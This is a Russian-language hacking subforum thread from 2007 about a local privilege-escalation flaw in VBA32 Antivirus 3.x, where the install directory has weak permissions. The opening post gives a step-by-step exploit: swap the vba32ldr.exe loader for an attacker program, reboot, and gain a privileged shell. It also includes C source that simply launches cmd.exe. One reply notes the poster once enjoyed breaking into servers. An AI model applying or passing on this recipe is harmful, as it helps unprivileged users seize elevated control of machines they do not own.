Association Online of Gamers Четверг, 25.02.2021, 08:38
Приветствую Вас Гость | RSS
[ Новые сообщения · Участники · Правила форума · Поиск · RSS ]
  • Страница 1 из 1
  • 1
Модератор форума: Graid, Osip  
Форум » Технодром » Хак и прочии радости жизни » VBA32 Antivirus 3.x
VBA32 Antivirus 3.x
SneppyДата: Воскресенье, 07.10.2007, 08:40 | Сообщение # 1
Группа: Удаленные





Программа: VBA32 Antivirus 3.x

Уязвимость позволяет локальному злоумышленнику выполнить вредоносные действия с повышенными привилегиями на целевой системе. Уязвимость существует из-за того, что приложение не правильно устанавливает права доступа на инсталляционную директорию VBA32. Атакующий может заменить файлы в директории VBA32, что позволит ему повысить свои привилегии на целевой системе.

Пример:

- Войти в систему как LUA пользователь
- Переименовать vba32ldr.exe в vba32ldr.exe.BAK
- Скопировать program.exe в Vba32 инсталляционную директорию
- Переименовать program.exe в vba32ldr.exe
- Перезагрузить операционную систему
- "rootshell" wink

#Исходный код для program.exe:#include <stdio.h>int main()
{ system("cmd.exe"); return 0;
}

 
GraidДата: Понедельник, 08.10.2007, 16:11 | Сообщение # 2
4 lvl
Группа: Пользователи
Сообщений: 281
Репутация: 11
Статус: Offline
Жалко что эта антитварь несильно распространена...
Гы гы. Sneppy, Хаком заинтересовался?


Только когда плывешь против течения понимаешь чего стоит свободное мнение... © Ленинград
 
SneppyДата: Понедельник, 08.10.2007, 17:44 | Сообщение # 3
Группа: Удаленные





всегда любил раньше серверы ломать , сейчас както отошел от этого ..
 
Форум » Технодром » Хак и прочии радости жизни » VBA32 Antivirus 3.x
  • Страница 1 из 1
  • 1
Поиск:

Copyright assotiation © 2007Хостинг от uCoz